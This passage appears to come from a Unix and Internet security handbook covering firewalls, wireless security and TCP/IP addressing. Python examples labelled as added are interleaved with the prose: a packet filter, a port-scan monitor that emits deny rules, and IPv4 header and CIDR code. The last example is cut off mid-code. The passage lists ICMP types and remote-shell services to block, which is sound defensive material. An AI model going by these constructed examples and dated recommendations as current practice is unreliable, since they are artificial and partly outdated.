Packet-filtering firewalls intercept and analyze network data packets and determine if they should be allowed to pass through the firewall or not. Traditional packet-filtering firewalls are relatively simple-minded. They can allow, deny, or otherwise mangle packets using the information contained in the packet's headers, such as source and destination addresses and ports, and packet flags like SYN. Packet filters that perform stateful inspection keep track of the state of each connection passing through the firewall and may examine the contents of each packet in greater detail in order to determine whether they "belong" to a particular connection. For example, a stateful firewall can identify an FTP data transfer connection, determine that it is associated with an existing FTP control connection, and allow it, while disallowing a new inbound connection on the same port.
An application gateway operates at the application level of the network, rather than the packet level, and is typically built of several proxies for application services to be provided. Rather than connect to the organization's web server itself, outsiders might connect to the firewall's web server proxy operating on port 80. The proxy software insures that the connection is appropriate, may validate the data stream, and then passes it on to the actual internal web server; the proxy is similarly responsible for relaying the outbound data from the web server back to the client.

Some policies that an external firewall might be used to implement include:
· Disallow all incoming traffic by default, but permit a few exceptions, such as allowing anyone to make an HTTP connection to port 80, and a list of predefined hosts to make an SSH connection to port 22. This "deny everything that isn't permitted" approach is a recommended security practice.
· Allow outgoing HTTP connections to anywhere on the Internet, but only allow incoming connections to a few select hosts.
· Log firewall violations for later analysis.

Several (very good) books on firewalls are available that discuss their design and deployment in depth, including how to organize multiple firewalls to partition the network into a subnetwork of hosts that outsiders can access (often called the "demilitarized zone") and a subnetwork of hosts that are protected from outsiders. Especially recommended are Cheswick, Bellovin, and Rubin's 2003 book Firewalls and Internet Security: Repelling the Wily Hacker, Second Edition, and Zwicky, Cooper, and Chapman's 2000 book Building Internet Firewalls, Second Edition.

Host-Based Firewalls
Many systems, including most Unix systems and recent Microsoft systems, contain a built-in packet filter. Some, like Linux 2.4's netfilter component, provide stateful inspection of packets as well. The firewall is controlled with rules that are loaded into the kernel at runtime.
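The ingress and egress filters recommended for border routers and the "deny everything that isn't permitted" policy list above can be made concrete in a small simulation. The following is an added example, not code from the handbook or from any firewall product: a Python packet filter that first applies the anti-spoofing checks on each interface, then consults a default-deny policy and a table of established connections so that replies to permitted connections get through and every rejected packet is logged. The network 192.0.2.0/24, the server 192.0.2.10, the partner host 198.51.100.7 allowed to reach SSH, and the sample packets are all constructed for the example.

```python
"""Border packet filter: anti-spoofing plus a default-deny stateful policy.

Added illustration (not the handbook's code). Network numbers, hosts and the
sample packets are constructed for the example.
"""
import ipaddress
from dataclasses import dataclass, field

# Constructed values: the organization's network, its public-facing server,
# and the outside hosts allowed to open SSH connections to it.
INTERNAL_NET = ipaddress.ip_network("192.0.2.0/24")
SERVER = ipaddress.ip_address("192.0.2.10")
SSH_ALLOWED = {ipaddress.ip_address("198.51.100.7")}


@dataclass(frozen=True)
class Packet:
    iface: str        # "ext" (Internet side) or "int" (LAN side) where it arrived
    src: str
    dst: str
    proto: str        # only "tcp" is used in this example
    sport: int
    dport: int
    syn: bool = True  # True for a connection-opening segment


@dataclass
class BorderFilter:
    # Permitted flows keyed by (src, sport, dst, dport); the reverse direction
    # of a known flow is allowed without consulting the policy again.
    flows: set = field(default_factory=set)
    log: list = field(default_factory=list)

    def _anti_spoof(self, p, src):
        # Ingress filter: a packet from the Internet must not claim an internal source.
        if p.iface == "ext" and src in INTERNAL_NET:
            return "drop: ingress spoof"
        # Egress filter: nothing leaves unless its source address is one of ours.
        if p.iface == "int" and src not in INTERNAL_NET:
            return "drop: egress spoof"
        return None

    def _policy(self, p, src, dst):
        # Deny everything that isn't permitted: return the first matching allow rule.
        if p.iface == "ext":
            if dst == SERVER and p.dport == 80:
                return "allow: inbound http"
            if dst == SERVER and p.dport == 22 and src in SSH_ALLOWED:
                return "allow: inbound ssh from listed host"
            return None
        if p.iface == "int" and p.dport == 80:
            return "allow: outbound http"
        return None

    def decide(self, p):
        """Return the verdict for one packet, recording flows and violations."""
        src, dst = ipaddress.ip_address(p.src), ipaddress.ip_address(p.dst)
        verdict = self._anti_spoof(p, src)
        if verdict is None:
            if (p.dst, p.dport, p.src, p.sport) in self.flows:
                verdict = "allow: reply on established flow"
            elif not p.syn:
                verdict = "drop: no matching flow"      # stray mid-connection segment
            else:
                verdict = self._policy(p, src, dst) or "drop: default deny"
        if verdict.startswith("allow"):
            self.flows.add((p.src, p.sport, p.dst, p.dport))
        else:
            self.log.append(f"{verdict} {p.iface} {p.src}:{p.sport}->{p.dst}:{p.dport}")
        return verdict


def run_samples():
    """Push constructed packets through the filter; return verdicts and the violation log."""
    fw = BorderFilter()
    samples = [
        Packet("ext", "203.0.113.5", "192.0.2.10", "tcp", 40000, 80),              # web visitor
        Packet("ext", "203.0.113.5", "192.0.2.10", "tcp", 40001, 22),              # ssh from unlisted host
        Packet("ext", "198.51.100.7", "192.0.2.10", "tcp", 50000, 22),             # ssh from listed host
        Packet("ext", "192.0.2.77", "192.0.2.10", "tcp", 1234, 80),                # claims an internal source
        Packet("int", "192.0.2.20", "203.0.113.9", "tcp", 51000, 80),              # outbound browsing
        Packet("ext", "203.0.113.9", "192.0.2.20", "tcp", 80, 51000, syn=False),   # the reply to it
        Packet("int", "10.9.9.9", "203.0.113.9", "tcp", 1, 80),                    # forged source leaving
        Packet("int", "192.0.2.20", "203.0.113.9", "tcp", 51001, 25),              # outbound smtp: not permitted
    ]
    return [fw.decide(p) for p in samples], fw.log


if __name__ == "__main__":
    for line in run_samples()[1]:
        print(line)
```

The anti-spoofing checks run before the policy so that a forged internal source can never match an "allow" rule, and replies are admitted only when the reverse four-tuple was recorded by an earlier permitted packet, which is the stateful behaviour the text describes.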
Rules can block or allow packets to flow based on packet type, host, protocol, and even packet-level flags. Guidelines for configuration of host-based packet filters are largely the same as those for external firewalls. The rules that you add to the kernel with a packet-level firewall are in addition to any access control rules that you might implement within network applications, with the tcpwrapper system (discussed below), or with any external firewall that may be protecting the network that the host is on. The kernel-level firewall can give you an additional layer of protection and is an important part of a defense-in-depth strategy.

The primary disadvantage of packet-level firewalls is that they consume some CPU power; this can be a special concern on systems that are heavily loaded and in cases where the rule sets are very long -- the added CPU requirements may be more than your system can handle! For most situations, however, packet-level firewalls do not place an excessive burden on the system. For example, an Intel-based 486 running at 33 MHz with a free Unix kernel can easily handle the traffic of a fully-loaded T1 or DSL line.

Most host-based firewalls allow you to configure rules that will apply to incoming packets destined for the host, outgoing packets leaving the host, or packets being forwarded by a host that is serving as a gateway. Filtering incoming packets is an important way to restrict access to network services. Filtering outgoing packets can limit accidental exposure of important system resources and configuration information, and can reduce the damage that can be done if the machine should be compromised by a Trojan. It can also help enforce policies on acceptable network use, but sufficiently knowledgeable users can often tunnel connections through outbound filters.

One of the more interesting developments in host-based firewalls is on-demand filtering.
If you're not running several services because of known vulnerabilities, you might instead run a monitor that listens on the unused ports, or even on every unused port below 1024. If a remote host tries to connect to your host for NNTP when you're not a news server, or to use the TFTP service, the monitor takes action: logging the attempt, adding the remote host's IP address to a tcpwrapper deny rule, or adding a host-based firewall rule to block the remote host from any connections. If you're concerned about accidentally blocking an innocent host, the monitor might be configured to require multiple probes before firewalling the remote host. Several free and commercial scan-detection monitors are available for different platforms.

Wireless Networking
An increasingly prevalent networking strategy, particularly in locations where adding network infrastructure would be costly or infeasible, is wireless networking. Wireless networks generally follow the IEEE 802.11 standards, which include 802.11b, 802.11a, and 802.11g [239]. In a typical wireless network, devices called wireless access points are installed to receive and transmit data within a given area (e.g. one floor of a building). Access points may be bridged to one another, but eventually must connect to the organization's (wired) router if packets are to be routed outside of the organization.

There are several important security considerations in setting up a wireless network. Data on the network should be private: it should be infeasible for an attacker to eavesdrop. Moreover, it should be infeasible for an attacker to join the wireless network and take advantage of its resources (such as Internet connectivity). Unfortunately, wireless networking does not have a good security record. In particular, most 802.11b networks offer little protection.
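As an added example of the on-demand filtering idea (not the handbook's code and not any particular scan-detection product), the monitor below watches connection attempts to unused ports below 1024, logs each probe, and, only after a configurable number of probes from the same host, produces a tcpwrapper-style deny line for that host. The set of legitimate service ports, the threshold of three probes, and the connection attempts it processes are constructed assumptions.

```python
"""Scan-detection monitor for on-demand filtering.

Added illustration, not the handbook's code. The service ports, the probe
threshold and the connection attempts below are constructed; the deny rules
it emits are plain strings in hosts.deny style ("ALL: host"), not applied anywhere.
"""
from collections import defaultdict

SERVICE_PORTS = {22, 80}   # constructed: services this host actually runs
PROBE_THRESHOLD = 3        # assumed policy: probes from one host before it is blocked


class ProbeMonitor:
    def __init__(self, threshold=PROBE_THRESHOLD):
        self.threshold = threshold
        self.probes = defaultdict(list)   # remote host -> unused ports it touched
        self.blocked = set()
        self.log = []

    def observe(self, ts, remote, port):
        """Handle one inbound connection attempt and return the action taken."""
        if port in SERVICE_PORTS or port >= 1024:
            return "ignore"              # a real service, or outside the watched range
        if remote in self.blocked:
            return "already-blocked"
        self.probes[remote].append(port)
        self.log.append(f"{ts} probe from {remote} to unused port {port}")
        if len(self.probes[remote]) >= self.threshold:
            # Requiring several probes avoids firewalling a host that made one stray connection.
            self.blocked.add(remote)
            self.log.append(f"{ts} blocking {remote} after {len(self.probes[remote])} probes")
            return "block"
        return "log"

    def deny_rules(self):
        """Render the blocked hosts as hosts.deny lines ("ALL: host")."""
        return [f"ALL: {h}" for h in sorted(self.blocked)]


def run_samples():
    """Feed constructed attempts (timestamp, remote host, port) to the monitor."""
    mon = ProbeMonitor()
    attempts = [
        ("10:00:01", "203.0.113.8", 80),      # legitimate web hit
        ("10:00:02", "203.0.113.8", 443),     # one stray probe from the same visitor
        ("10:00:05", "198.51.100.23", 119),   # NNTP on a host that is not a news server
        ("10:00:05", "198.51.100.23", 69),    # TFTP
        ("10:00:06", "198.51.100.23", 23),    # third probe: block the host
        ("10:00:07", "198.51.100.23", 21),    # further attempts from a blocked host
        ("10:00:08", "198.51.100.23", 2049),  # above 1024: outside the watched range
    ]
    actions = [mon.observe(*a) for a in attempts]
    return actions, mon.deny_rules(), mon.log


if __name__ == "__main__":
    for line in run_samples()[2]:
        print(line)
```

The visitor that touched port 443 once is logged but never blocked, while the host that probed three unused ports is; tuning the threshold is the trade-off the text mentions between catching scans and blocking innocent hosts.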
Although a protocol for link-level encryption called WEP (Wired Equivalent Privacy) is widely used, WEP has been demonstrated to be fundamentally flawed, and attackers with relatively simple hardware (a laptop and a wireless card) can capture enough data packets to divulge the encryption key and render all of the data visible. The most popular access control approaches, such as MAC filtering (only allowing wireless clients with known hardware addresses to connect), are also relatively weak, as MACs are easy to determine and can be changed. Although it's a good idea to enable all of these security features, as well as changing default SSIDs and turning off SSID broadcast, they do not add up to a secure wireless network.

On older 802.11b networks, confidentiality can generally be achieved only by requiring clients to use additional end-to-end encryption (such as SSH or VPN systems) for their connections. Access control can be managed through use of a captive portal. In this system, a firewall (ideally, operating on each access point) blocks all unauthenticated traffic except traffic directed to the portal application, which is responsible for (securely) authenticating the user, and directing the firewall to allow packets from the authenticated machine to be routed for a limited time. For example, the portal application might run on an SSL-protected web and RADIUS server connected by Ethernet to the access point. A more secure approach is outlined in the IEEE 802.1x standard.

[239] Other wireless devices, like cell phones and PDAs, may use GSM cellular networks instead. Many of the problems that plague 802.11 networks are also prevalent in GSM networks; for more information, see "Mobile Risk Management: E-Finance in the Wireless Environment" (2002), by Tom Kellermann for The World Bank: www.worldbank1.org/finance
Wireless devices that support this standard use the Extensible Authentication Protocol (EAP) to exchange authentication data. Wireless clients start out in an unauthenticated mode in which they can only send the initial EAP packet. The access point responds with an EAP request for the client's identity, which the client transmits. This conversation occurs over a secure channel, most commonly implemented via a variation of TLS. The access point authenticates the identity and changes the client's mode to authenticated. It transmits an initial WEP key to be used to encrypt the wireless data, and can change keys during the connection; by changing keys frequently, attacks against WEP that rely on capturing many packets with the same key are prevented.

A new specification, Wi-Fi Protected Access (WPA), offers an improved encryption system in place of WEP, and the ability to perform authentication either through 802.1x or by use of a shared key. The latter mode is primarily intended for home or small office users who cannot set up their own RADIUS servers for 802.1x authentication.

Like wired networks, wireless networks can also benefit from appropriate configuration of packet filters on access points, appropriate location of access points in the network topology (ideally, outside the internal firewall), and similar approaches to hardening network security. Running a network intrusion detection system on the wireless network is also a good practice.

Finally, note that wireless networks are susceptible to jamming. For example, a leaky microwave oven can effectively disrupt a wireless network based on the Wi-Fi (802.11) technology, as both microwave ovens and Wi-Fi systems use the same band of the 2.4 GHz spectrum. Although jamming may not lead to information disclosure, it can effectively make a wireless network unusable.

Two useful books for building secure wireless networks are 802.11 Security and RADIUS, both published by O'Reilly and Associates.
TCP/IP Networking
The Internet Protocol (IP) is the glue that holds together modern computer networks. IP specifies the way that messages are sent from computer to computer; it essentially defines a common "language" that is spoken by every computer stationed on the Internet.

IPv4, the fourth version of the Internet Protocol, has been used on the Internet since 1982. IPv4 is universally used today, and will likely see continued use for many years to come. IPv5 was an experimental protocol that was never widely used. IPv6 is the newest version of the Internet Protocol. IPv6 provides for a dramatically expanded address space, built-in encryption, and plug-and-play Internet connectivity. As of 2003, IPv6 is largely being used on an experimental basis, although use of this new Internet Protocol is slowly increasing.

On the Internet, data is sent in blocks of characters called datagrams, or more colloquially, packets. Each packet has a small block of bytes called the header, which identifies the sender and intended destination on each computer. The header is followed by another, usually larger, block of characters of data called the packet's contents. After the packets reach their destination, they are often reassembled into a continuous stream of data; this fragmentation and reassembly process is usually invisible to the user. As there are often many different routes from one system to another, each packet may take a slightly different path from source to destination. Because the Internet switches packets, instead of circuits, it is called a packet-switching network.

The IP packets can themselves be encapsulated within packets used by other network protocols. Today, many IP networks built from "leased lines" actually send IP packets encapsulated within Frame Relay or ATM (Asynchronous Transfer Mode) networks.
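To make the header/contents split described above concrete, here is an added example (not from the handbook) that builds and parses the 20-byte IPv4 header in Python, including the ones'-complement header checksum that lets a receiver notice a corrupted header and the fragment fields involved in the reassembly the text mentions. The addresses and the payload are constructed.

```python
"""Building and parsing an IPv4 header with its checksum.

Added illustration, not the handbook's code. Addresses (from the RFC 5737
documentation ranges) and the payload are constructed for the example.
"""
import struct
import ipaddress

HEADER_FMT = "!BBHHHBBHII"   # 20 bytes: no IP options in this example


def ipv4_checksum(header: bytes) -> int:
    """Ones'-complement sum of the header's 16-bit words, as IPv4 requires.
    Over a header whose checksum field is already filled in, the result is 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_header(src, dst, payload_len, proto=6, ttl=64, ident=0x1234, frag=0):
    """Return a 20-byte IPv4 header with a correct checksum (proto 6 = TCP)."""
    ver_ihl = (4 << 4) | 5                   # version 4, header length 5 words
    fields = [ver_ihl, 0, 20 + payload_len, ident, frag, ttl, proto, 0,
              int(ipaddress.ip_address(src)), int(ipaddress.ip_address(dst))]
    fields[7] = ipv4_checksum(struct.pack(HEADER_FMT, *fields))
    return struct.pack(HEADER_FMT, *fields)


def parse_header(packet: bytes) -> dict:
    """Return the header fields and contents of an IPv4 packet, or raise ValueError."""
    if len(packet) < 20:
        raise ValueError("too short for an IPv4 header")
    (ver_ihl, _tos, total_len, ident, flags_frag, ttl, proto,
     _csum, src, dst) = struct.unpack(HEADER_FMT, packet[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0xF) * 4
    if version != 4 or ihl < 20 or ihl > len(packet):
        raise ValueError("bad version or header length")
    if ipv4_checksum(packet[:ihl]) != 0:
        raise ValueError("header checksum mismatch")
    return {
        "src": str(ipaddress.ip_address(src)),
        "dst": str(ipaddress.ip_address(dst)),
        "protocol": proto,
        "ttl": ttl,
        "identification": ident,
        "total_length": total_len,
        "more_fragments": bool(flags_frag & 0x2000),   # MF flag
        "fragment_offset": (flags_frag & 0x1FFF) * 8,  # in bytes
        "contents": packet[ihl:total_len],
    }


def demo():
    """Parse a well-formed packet, then show that a flipped bit is caught by the checksum."""
    payload = b"constructed payload"
    hdr = build_header("192.0.2.1", "198.51.100.2", len(payload))
    good = parse_header(hdr + payload)
    corrupted = bytearray(hdr + payload)
    corrupted[19] ^= 0x01                    # last byte of the destination address
    try:
        parse_header(bytes(corrupted))
        tampered_detected = False
    except ValueError:
        tampered_detected = True
    return good, tampered_detected


if __name__ == "__main__":
    print(demo())
```

Note that the header checksum only covers the header and only protects against accidental corruption in transit; it is not a security control, which is why the handbook's later advice relies on encryption and filtering rather than on anything in the IP header itself.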
IP addressing
Every interface that a computer has on an IPv4 network is assigned a unique 32-bit address. These addresses are often expressed as a set of four 8-bit numbers called octets. A sample address is 18.70.0.224. A computer can have multiple network interfaces, each with a different address, and potentially with each on a different LAN or serial line.

Theoretically, the 32-bit IP address allows a maximum of 2^32 = 4,294,967,296 computers to be attached to the Internet at a given time. In practice, the total number of computers that can be connected is much more than 2^32 because it is possible for many computers to share a single IP address through the use of technologies such as proxies and Network Address Translation. These multiple systems behind the single IP address can be configured with a variety of policies to govern connectivity between machines, allowing no access, restricted access, or unlimited access in either or both directions.

IP networks
The Internet is a network of networks. Although many people think of these networks as being major networks, such as those belonging to companies like AT&T, WorldCom, and Sprint, most of the networks that make up the Internet are actually local area networks, such as the network in an office building or the network in a small research laboratory. Each of these small networks is given its own network number.

There are two methods of looking at network numbers. The "classical" network numbers were distinguished by a unique prefix of bits in the address of each host in the network. This approach partitioned the address space into a well-defined set of differently sized networks. There are five primary kinds of IP addresses in the "classical" address scheme; the first few bits of the address (the most significant bits) define the class of network to which the address belongs.
The remaining bits are divided into a network part and a host part:

Class A addresses
Hosts on Class A networks have addresses in the form N.a.b.c, in which N is the network number and a.b.c is the host number; the most significant bit of N must be 0. There are not many Class A networks, as they are quite wasteful; unless your network has 16,777,216 separate hosts, you don't need a Class A network. Nevertheless, many early pioneers of the Internet, such as MIT and Bolt Beranek and Newman (BBN), were assigned Class A networks. Of course, these organizations don't really put all of their computers on the same physical network. Instead, most of them divide their internal networks as (effectively) Class B or Class C networks. This approach is known as subnetting.

Class B addresses
Hosts on Class B networks have addresses in the form N.M.a.b, in which N.M is the network number and a.b is the host number; the most significant two bits of N must be 10. Class B networks are commonly found at large universities and major commercial organizations.

Class C addresses
Hosts on Class C networks have addresses in the form N.M.O.a, in which N.M.O is the network number, and a is the host number; the most significant three bits of N must be 110. These networks can only accommodate a maximum of 254 hosts. (Flaws and incompatibilities between various IP implementations make it unwise to assign IP addresses ending in either 0 or 255.) Most organizations have one or more Class C networks.

Class D addresses
A Class D address is of the form N.M.O.a, in which the most significant four bits of N are 1110. These addresses are not actually of networks, but of multicast groups, which are sets of hosts that listen on a common address to receive broadcasts.

Class E addresses
A Class E address is of the form N.M.O.P, in which the most significant four bits of N are 1111. These addresses are currently reserved for experimental use.
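The class test and the network/host split described above, worked as an added example (this is not code from the Handbook): the class is read from the leading bits of the first octet, and, going beyond the five fixed classes, the network, netmask and host range are computed for any prefix length k, which is what subnetting and the slash notation discussed next make explicit. The dotted-quad parser and all function names are the example's own.

```python
"""Classful and prefix-based IPv4 address arithmetic.

Added example, not from the Handbook. Implements the rules in the text:
class from the most significant bits of the first octet, and for a
network given as <lowest address>/<prefix> or <lowest address>/<netmask>
the netmask, the first and last address, and the number of host addresses
(2^(32-k)).
"""


def ip_to_int(addr: str) -> int:
    """Strict dotted-quad parser: exactly four decimal octets in 0..255."""
    parts = addr.split(".")
    if len(parts) != 4:
        raise ValueError(f"not a dotted quad: {addr!r}")
    value = 0
    for part in parts:
        if not part.isdigit() or not 0 <= int(part) <= 255:
            raise ValueError(f"bad octet {part!r} in {addr!r}")
        value = (value << 8) | int(part)
    return value


def int_to_ip(value: int) -> str:
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def address_class(addr: str) -> str:
    """Classical class: 0xxx -> A, 10xx -> B, 110x -> C, 1110 -> D, 1111 -> E."""
    first_octet = ip_to_int(addr) >> 24
    if first_octet >> 7 == 0b0:
        return "A"
    if first_octet >> 6 == 0b10:
        return "B"
    if first_octet >> 5 == 0b110:
        return "C"
    if first_octet >> 4 == 0b1110:
        return "D"
    return "E"


def netmask_from_prefix(k: int) -> int:
    """The k most significant bits set, the remaining 32-k bits clear."""
    if not 0 <= k <= 32:
        raise ValueError("prefix length must be between 0 and 32")
    return (0xFFFFFFFF << (32 - k)) & 0xFFFFFFFF


def prefix_from_netmask(mask: str) -> int:
    """Inverse of netmask_from_prefix; rejects masks whose 1s are not contiguous."""
    m = ip_to_int(mask)
    k = bin(m).count("1")
    if netmask_from_prefix(k) != m:
        raise ValueError(f"non-contiguous netmask {mask}")
    return k


def describe_network(spec: str) -> dict:
    """Accepts '128.200.0.0/14' or '128.200.0.0/255.252.0.0'."""
    base, _, suffix = spec.partition("/")
    if not suffix:
        raise ValueError("expected <address>/<prefix> or <address>/<netmask>")
    k = int(suffix) if suffix.isdigit() else prefix_from_netmask(suffix)
    mask = netmask_from_prefix(k)
    network = ip_to_int(base) & mask
    if network != ip_to_int(base):
        raise ValueError(f"{base} is not the lowest address of a /{k} block")
    return {
        "network": int_to_ip(network),
        "prefix": k,
        "netmask": int_to_ip(mask),
        "first": int_to_ip(network),
        "last": int_to_ip(network | (~mask & 0xFFFFFFFF)),
        "host_addresses": 2 ** (32 - k),
    }


def contains(spec: str, addr: str) -> bool:
    """True when addr falls inside the network given by spec."""
    info = describe_network(spec)
    mask = netmask_from_prefix(info["prefix"])
    return (ip_to_int(addr) & mask) == ip_to_int(info["network"])


if __name__ == "__main__":
    print(address_class("18.70.0.224"))
    print(describe_network("128.200.0.0/14"))
```

The 128.200.0.0/14 case from the next section comes out as first address 128.200.0.0, last address 128.203.255.255, netmask 255.252.0.0 and 2^18 host addresses; a Class A /8 gives the 16,777,216 hosts quoted above.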
Several of these network classes had large "holes", sets of host addresses that were never used. With the explosion of sites on the Internet, a somewhat different interpretation of network addresses has been proposed, which allows more granularity in the assignment of network addresses and less waste. This approach is the Classless InterDomain Routing (CIDR) scheme. As the name implies, there are no "classes" of addresses as in the classical scheme. Instead, networks are defined as being the most significant k bits of each address, with the remaining 32-k bits being used for the host part of the address. Thus, a service provider could be given a range of addresses whereby the first 14 bits of the address are fixed at a particular value (the network address), and the remaining 18 bits represent the portion of the address available to allocate to hosts. This method allows the service provider to allocate up to 2^18 distinct addresses to customers.

CIDR networks are often abbreviated as the lowest IP address in the range, followed by a slash and the size, in bits, of the network portion. For example, the network 128.200.0.0/14 represents all of the IP addresses from 128.200.0.0 to 128.203.255.255. Another way that this network is often abbreviated is with the lowest IP address in the range, followed by a slash and the netmask, which is the dotted-octet value in which the k most significant bits are 1s and all others are 0s. In our example, this abbreviation would be 128.200.0.0/255.252.0.0. The CIDR scheme is compatible with the classical address format, with Class A addresses using an 8-bit network field (e.g., 10.0.0.0/8), Class B networks using a 16-bit network address (e.g., 192.168.0.0/16), and so on.

Packets and Protocols

Today there are four main kinds of IP packets that are sent on the Internet that will be seen by typical hosts (additional types of packets may be used by routers on major backbones or in VPNs).
Each is associated with a particular protocol:

ICMP
Internet Control Message Protocol. This protocol is used for low-level operation of the IP protocol. There are several subtypes--for example, for the exchange of routing and traffic information.

TCP
Transmission Control Protocol. This protocol is used to create a two-way stream connection between two computers. It is a "connected" protocol and includes time-outs and retransmission to ensure reliable delivery of information.

UDP
User Datagram Protocol. This protocol is used to send packets from host to host. The protocol is "connectionless" and makes a best-effort attempt at delivery. Although the protocol is technically unreliable because it does not guarantee that information sent will be delivered, in practice most UDP packets reach their destination under normal operating circumstances.

IGMP
Internet Group Management Protocol. This protocol is used to control multicasting, which is the process of purposely directing a packet to more than one host. Multicasting is the basis of the Internet's multimedia backbone, the MBONE. (Currently, IGMP is not used inside the MBONE, but is used on the edge.)

ICMP

The Internet Control Message Protocol is used to send messages between gateways and hosts regarding the low-level operation of the Internet. For example, the ping command uses ICMP Echo packets to test for network connectivity; the response to an Echo packet is usually either an ICMP Echo Reply or an ICMP Destination Unreachable message type. In addition to the information in the IP header (packet source and destination addresses), each ICMP packet contains an ICMP header that includes an 8-bit packet type value. Some of the ICMP packet types are no longer used on the Internet, although many of them remain supported in most TCP/IP implementations. This has been an occasional source of security problems.
In particular, packet types 3 (destination unreachable), 4 (source quench), and 5 (redirect) present security risks, because an attacker who can craft ICMP packets of these types can redirect network traffic or perform a denial of service. Although the other packet types present less of an immediate risk, different versions of different operating systems often have subtly different responses to these ICMP packets, and attackers can use the pattern of responses to help "fingerprint" the operating system on your system to exploit known bugs. If you use a firewall, you should be sure that many ICMP packet types are blocked or monitored. You can generally safely block incoming ICMP packets of types 5, 13 (timestamp request), 14 (timestamp reply), 17 (address-mask request), and 18 (address-mask reply), and outgoing ICMP packets of types 5, 11 (time exceeded), 12 (parameter problem), 13, 14, 17, and 18.

TCP

TCP provides a reliable, ordered, two-way transmission stream between two programs that are running on the same or different computers. "Reliable" means that every byte transmitted is guaranteed to reach its destination (or you are notified that the transmission failed), and that each byte arrives in the order in which it was sent. Of course, if the connection is physically broken, bytes that have not been transmitted will not reach their destination unless an alternate route can be found. In such an event, the computer's TCP implementation should send an error message to the process that is trying to send or receive characters, rather than give the impression that the link is still operational.

Each TCP connection is attached at each end to a port. Ports are identified by 16-bit numbers. For most TCP protocols the server uses the port number assigned to the service it is providing, and the client's port number is randomly chosen by the client on a per-connection basis. Some well-known port numbers are port 80 for HTTP servers and port 25 for SMTP servers.
On the wire, TCP packets are IP packets that include an additional TCP header. This header contains, among other things:

· TCP port number of the packet's source.
· TCP port number of the packet's destination.
· Sequence information, so that the receiver can correctly assemble the information in this TCP packet to its correct point in the TCP stream.
· Flow control information, which tells the receiver how many more bytes the originator of the packet can receive. This is called the TCP window.
· TCP checksum.

At any instant, every IPv4 TCP connection on the Internet can be identified by a set of two 32-bit numbers and two 16-bit numbers:

· Host address of the connection's originator (from the IP header)
· Port number of the connection's originator (from the TCP header)
· Host address of the connection's target (from the IP header)
· Port number of the connection's target (from the TCP header)

The TCP protocol uses two special bits in the packet header, SYN and ACK, to negotiate the creation of new connections. To open a TCP connection, the requesting host sends a packet that has the SYN bit set but does not have the ACK bit set. The receiving host acknowledges the request by sending back a packet that has both the SYN and the ACK bits set. Finally, the originating host sends a third packet, with the ACK bit set but the SYN bit unset. This process is called the TCP "three-way handshake." By looking for packets that have the SYN bit set and the ACK bit unset, one can distinguish packets requesting new connections from those that are sent in response to connections that have already been created. This distinction is useful when constructing packet-filtering firewalls.

TCP is used for most Internet services that require the sustained synchronous transmission of a stream of data in one or two directions.
For example, TCP is used for the hypertext transfer protocol (HTTP), remote terminal service, file transfer, and electronic mail. TCP is also used for sending commands to displays using the X Window system. Table 5A identifies some common TCP services. Significant security problems or exploitable weaknesses have been found in the majority of them, as indicated in the notes.

Table 5A. Some common TCP services and ports

TCP port | Service name | Function | Security concerns | Recommendation
7 | echo | Echoes characters (for testing) | a | Disable
9 | discard | Discards characters (for testing) | |
13 | daytime | Time of day | a | Disable
19 | chargen | Character generator | a | Disable
21 | ftp | File Transfer Protocol (FTP) | b | Disable; use http or ssh
22 | ssh | Secure Shell (virtual terminal and file transfer) | | Highly recommended
23 | telnet | Virtual terminal | b | Disable; use ssh
25 | smtp | Electronic mail | c |
37 | time | Time of day | a | Disable
42 | nameserver | TCP nameservice | |
43 | whois | NIC whois service | |
53 | domain | Domain Name Service (DNS) | d |
79 | finger | User information | | Disable
80 | http | World Wide Web (WWW) | b, c |
110 | pop3 | Post Office Protocol (POP3) | b | Disable use of plaintext passwords, or use POP over TLS instead
111 | sunrpc | Sun Microsystems' Remote Procedure Call (RPC) | d | Restrict access
113 | auth | Remote username authentication service | | Use a version that returns encrypted tokens (see below)
119 | nntp | Network News Transfer Protocol (NNTP) (Usenet) | b, d | Restrict access
143 | imap | Interactive Mail Access Protocol | b | Disable use of plaintext passwords, or use IMAP over TLS instead
443 | https | SSL-encrypted HTTP | |
512 | exec | Executes commands on a remote Unix host | | Disable
513 | login | Logs in to a remote Unix host (rlogin) | b, d | Disable
514 | shell | Retrieves a shell on a remote Unix host (rsh) | b, d | Disable
515 | printer | Remote printing | d | Restrict access
1080 | socks | SOCKS application proxy service | c | Restrict access
2049 | NFS | NFS over TCP | d | Restrict access
6000-6010 | X | X Window system | b, d | Restrict access, tunnel through SSH

Security concerns:
a) Service can be remotely exploited to create a denial-of-service attack.
b) Protocol requires that a password be transmitted in cleartext across the Internet without the use of any encryption (under IPv4).
c) Improper configuration of SMTP servers, CGI scripts, and proxies is a leading contributor to the relaying of unwanted junk e-mail on the Internet.
d) Service is commonly configured for authentication using IP addresses. This is subject to spoofing and other kinds of attacks.

UDP

The User Datagram Protocol provides a simple, unreliable system for sending packets of data between two or more programs running on the same or different computers. "Unreliable" means that the operating system does not guarantee that every packet sent will be delivered, or that packets will be delivered in order. UDP does make a best effort to deliver the packets, however. On a LAN or uncrowded Internet path, UDP often approaches 100% reliability. UDP's advantage is that it has less overhead than TCP--less overhead lets UDP-based services transmit information with as much as 10 times the throughput. UDP is used primarily for Sun's Network Information System (NIS) and Network Filesystem (NFS), for resolving hostnames, and for transmitting routing information. It is also used for services that aren't affected negatively if they miss an occasional packet because they will get another periodic update later, or because the information isn't really that important.
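An added example, not code from the Handbook: a stateless packet-filter decision function built from the points made so far. It decodes the IPv4 header and the ICMP, TCP or UDP header behind it, applies the per-direction ICMP type blocks recommended in the ICMP section, recognises a new connection request by the SYN-set/ACK-unset test from the TCP section, and checks inbound requests against the "Disable" rows of Table 5A (TCP) and Table 5B (UDP, below). The header layouts follow RFCs 791, 792, 793 and 768 with no options; the sample packets are constructed inline, checksums are not validated, and the port sets are a subset of the tables.

```python
"""Stateless filtering decisions on raw IPv4 packets (added example)."""
import struct

SYN, ACK, RST = 0x02, 0x10, 0x04
# ICMP types the text says can generally be blocked, by direction.
ICMP_BLOCK_IN = {5, 13, 14, 17, 18}
ICMP_BLOCK_OUT = {5, 11, 12, 13, 14, 17, 18}
ICMP_RISKY = {3, 4, 5}                      # worth logging even where allowed
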